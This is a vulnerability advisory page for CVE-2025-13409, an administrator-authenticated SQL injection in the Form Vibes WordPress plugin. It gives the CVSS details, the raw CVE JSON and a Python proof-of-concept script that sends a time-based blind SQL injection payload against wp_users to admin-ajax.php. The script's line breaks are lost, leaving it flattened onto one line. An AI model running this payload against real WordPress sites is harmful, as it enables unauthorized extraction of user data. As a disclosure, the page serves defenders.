Security Vulnerability Report
中文
CVE-2025-13409 CVSS 4.9 MEDIUM

CVE-2025-13409

Published: 2026-01-06 04:15:53
Last Modified: 2026-04-15 00:35:42

Description

The Form Vibes – Database Manager for Forms plugin for WordPress is vulnerable to SQL Injection via the 'params' parameter in all versions up to, and including, 1.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Form Vibes插件 < 1.4.14 (所有1.x版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13409 PoC - Form Vibes SQL Injection # Target: WordPress site with Form Vibes plugin < 1.4.14 # Authentication: Requires administrator-level access target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" admin_cookie = sys.argv[2] if len(sys.argv) > 2 else "" # SQL Injection payload - extracts user login from wp_users table sql_payload = "1' AND (SELECT IF(SUBSTRING(user_login,1,1)='a',SLEEP(5),0) FROM wp_users LIMIT 1)-- -" # Vulnerable endpoint - analytics module vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" params = { 'action': 'fv_analytics_data', 'module': 'analytics', 'params': sql_payload # Vulnerable parameter } cookies = { 'wordpress_admin_cookie': admin_cookie } print(f"[*] Sending SQL injection payload to {vulnerable_endpoint}") print(f"[*] Payload: {sql_payload}") try: response = requests.post(vulnerable_endpoint, data=params, cookies=cookies, timeout=30) if response.elapsed.total_seconds() > 4: print("[+] Time-based blind SQL injection confirmed!") print(f"[+] Response time: {response.elapsed.total_seconds()}s") else: print("[-] No obvious injection detected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13409", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:52.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Form Vibes – Database Manager for Forms plugin for WordPress is vulnerable to SQL Injection via the 'params' parameter in all versions up to, and including, 1.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin Form Vibes – Database Manager for Forms para WordPress es vulnerable a inyección SQL a través del parámetro 'params' en todas las versiones hasta la 1.4.13, inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y la falta de preparación suficiente en la consulta SQL existente. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador y superior, añadan consultas SQL adicionales en consultas ya existentes que pueden ser utilizadas para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L51", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L62", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425061%40form-vibes&new=3425061%40form-vibes&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/28eb6998-be54-4cf9-8bb1-454c07151748?source=cve", "source": "[email protected]"}]}}